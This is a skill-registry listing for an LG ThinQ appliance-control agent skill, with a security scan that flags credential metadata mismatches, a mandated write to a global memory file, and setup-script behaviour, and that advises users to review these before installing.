Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
Lg Thinq Universal
v1.1.0Universal LG ThinQ device setup and control. Discovers appliances and generates secure device skills.
⭐ 1· 295·1 current·1 all-time
byUtkarsh Tiwari@utkarshthedev
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
OpenClaw
Suspicious
medium confidencePurpose & Capability
The SKILL.md and code clearly require LG PAT and country (LG_PAT, LG_COUNTRY) and perform device discovery, profile fetching, and generation of per-device skills — which is coherent with the declared purpose. However, the registry metadata at the top of the submission incorrectly lists no required environment variables or credentials; that mismatch (manifest vs runtime instructions/code) is an inconsistency that could mislead users about what secrets this skill needs and uses.
Instruction Scope
SKILL.md prescribes agent actions that include network calls to LG APIs, file creation (skill directories, .env per-device), venv creation, and a mandatory ‘persistence’ step that writes trigger phrases/paths/command summaries to a global MEMORY.md. The instructions claim to require explicit ask_user permission but also say certain actions 'MUST' be performed 'immediately' (e.g., persisting to MEMORY.md). Writing to global memory and copying tools into ~/.openclaw/workspace/skills are beyond simple discovery and are noteworthy scope/privilege expansions that the user should explicitly approve.
Install Mechanism
There is no install spec in the registry (instruction-only), but SKILL.md points to and the package includes setup.sh which will create a local venv and pip install dependencies from PyPI (requests, python-dotenv). Installing from PyPI is expected for a Python tool, but because setup.sh runs locally and extracts files/creates venvs, users should inspect setup.sh before running. No remote, opaque download URLs were shown in provided files, which reduces supply-chain risk compared to arbitrary remote binaries.
Credentials
The environment variables required by the runtime (LG_PAT, LG_COUNTRY, and per-device LG_DEVICE_ID) are appropriate for interacting with the LG ThinQ API — that part is proportional. The inconsistency is that registry metadata didn't declare these required env vars. Also the skill will read LG_PAT from shell or project .env and uses it to contact LG servers; the SKILL.md asserts never to write PAT into generated device folders, but the scripts and templates do create .api_server_cache and per-device .env files (the latter intended to contain only LG_DEVICE_ID). Ensure generated files and copy operations truly do not contain PAT or otherwise expose it.
Persistence & Privilege
The skill will create files under the user's skills workspace, create virtual environments, install dependencies, copy tools/constants, and — per SKILL.md and multiple reference docs — persist a summary into a global MEMORY.md (the skill's instructions say to 'MUST immediately' save trigger phrase, path, and command summary). Persisting this metadata to a global memory file is a privileged action (it writes to a global user artifact) and should be explicitly approved by the user. The skill is not always:true, and autonomous invocation is allowed (default), so combined with persistence this increases blast radius if misused; the SKILL.md does instruct prompting for consent, but the obligation to persist 'immediately' is worth flagging.
What to consider before installing
What to check and do before installing or running this skill:
- Registry vs runtime mismatch: The skill's registry entry claimed no required env vars, but SKILL.md and the code require LG_PAT and LG_COUNTRY. Treat LG_PAT as a sensitive secret — do not paste it into chat. Confirm the registry metadata with the publisher before proceeding.
- Inspect setup.sh and scripts locally before running: The package includes a setup.sh that will create a venv and pip install packages. Open setup.sh (and the scripts directory) and verify there are no unexpected remote downloads, obfuscated code, or commands that modify unrelated system paths before executing it.
- Review persistence behavior: The skill's workflow insists on writing generated skill files into your skills directory and saving a record to your global MEMORY.md. If you do not want these artifacts or metadata recorded, do not allow automatic persistence; insist that the agent ask for explicit approval each time and consider doing the assembly manually.
- Confirm that LG_PAT is never written to generated per-device folders: The SKILL.md repeatedly warns NOT to copy LG_PAT into device skill directories and says only LG_DEVICE_ID goes into per-device .env. After generation, inspect the new skill directories to confirm .env contains only LG_DEVICE_ID and that no file inadvertently contains the PAT.
- Network access and API keys: The included public constants (x-api-key, x-client-id) are non-secret and referenced in code; the only secret used is LG_PAT. Ensure you trust the skill owner to use your PAT only with LG ThinQ endpoints.
- Test in a safe environment first: If possible, run the setup and generation on a disposable account or isolated machine, or run the discovery steps without the '--confirm' flag to view the manifest and outputs first. When asked for confirmation, require the agent to show the exact file list and the MEMORY.md entry it proposes to write.
- If unsure, err on the side of caution: refuse automatic writing to global memory and require the agent to prompt for each network call and file-modifying action. If you want additional confidence, ask the skill author for a signed/published homepage or repo and a changelog, or run the code review by a trusted developer.Like a lobster shell, security has layers — review code before you run it.
latestvk97ehk68mh3tkkc1ybry5c0xq583c5sm
License
MIT-0
Free to use, modify, and redistribute. No attribution required.